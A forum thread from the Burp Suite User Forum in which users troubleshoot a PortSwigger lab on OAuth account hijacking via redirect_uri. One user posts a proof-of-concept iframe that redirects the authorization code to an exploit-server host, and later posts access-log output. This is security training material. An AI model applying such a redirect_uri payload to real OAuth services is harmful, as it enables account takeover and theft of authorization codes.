Research Academy
My account Customers About Blog Careers Legal Contact Resellers
The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Center. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTER DISCORD

OAuth account hijacking via redirect_uri

Andre | Last updated: Jul 25, 2024 08:38AM UTC

I am working on the following lab: https://portswigger.net/web-security/oauth/lab-oauth-account-hijacking-via-redirect-uri I have followed the solution instructions. PoC: <iframe src=https://oauth-0a5a009e035314258017744f02780029.oauth-server.net/auth?client_id=bbqce1dfey29kwqs6iloa&redirect_uri=https://exploit-0a6900b7036a148280c4753501fa00ff.exploit-server.net&response_type=code&scope=openid%20profile%20email></iframe> When I click ‘View Exploit’, the PoC works and I see the code in the access logs. But after storing the payload, and then clicking ‘Deliver to Victim’, no code arrives. Is this a bug?

Ben, PortSwigger Agent | Last updated: Jul 25, 2024 08:41AM UTC

Hi Andre, As noted in your other forum post - we have received your email about this so we will respond from there in due course.

c4rb0n | Last updated: Oct 23, 2024 02:53PM UTC

Hello, I have the same issue - I don't see any other user in "Access log" after "Deliver exploit to victim". Looks like a bug and a nasty one, because it's one of the labs from Exam preparation steps :c

Ben, PortSwigger Agent | Last updated: Oct 24, 2024 10:51AM UTC

Hi, If you try this in more than one lab instance (if you wait for your current instance to expire and then relaunch the lab so that you receive a lab with a different URL) are you ultimately able to solve this or do you still experience this issue?

c4rb0n | Last updated: Oct 24, 2024 11:25AM UTC

Hello, Yes, it's the same issue still: 2024-10-24 11:24:36 +0000 "POST / HTTP/1.1" 302 2024-10-24 11:24:36 +0000 "GET /deliver-to-victim HTTP/1.1" 302 2024-10-24 11:24:37 +0000 "GET / HTTP/1.1" 200 2024-10-24 11:24:37 +0000 "GET /resources/css/labsDark.css HTTP/1.1" 200 Nothing else... Does it work for you?

c4rb0n | Last updated: Oct 24, 2024 12:01PM UTC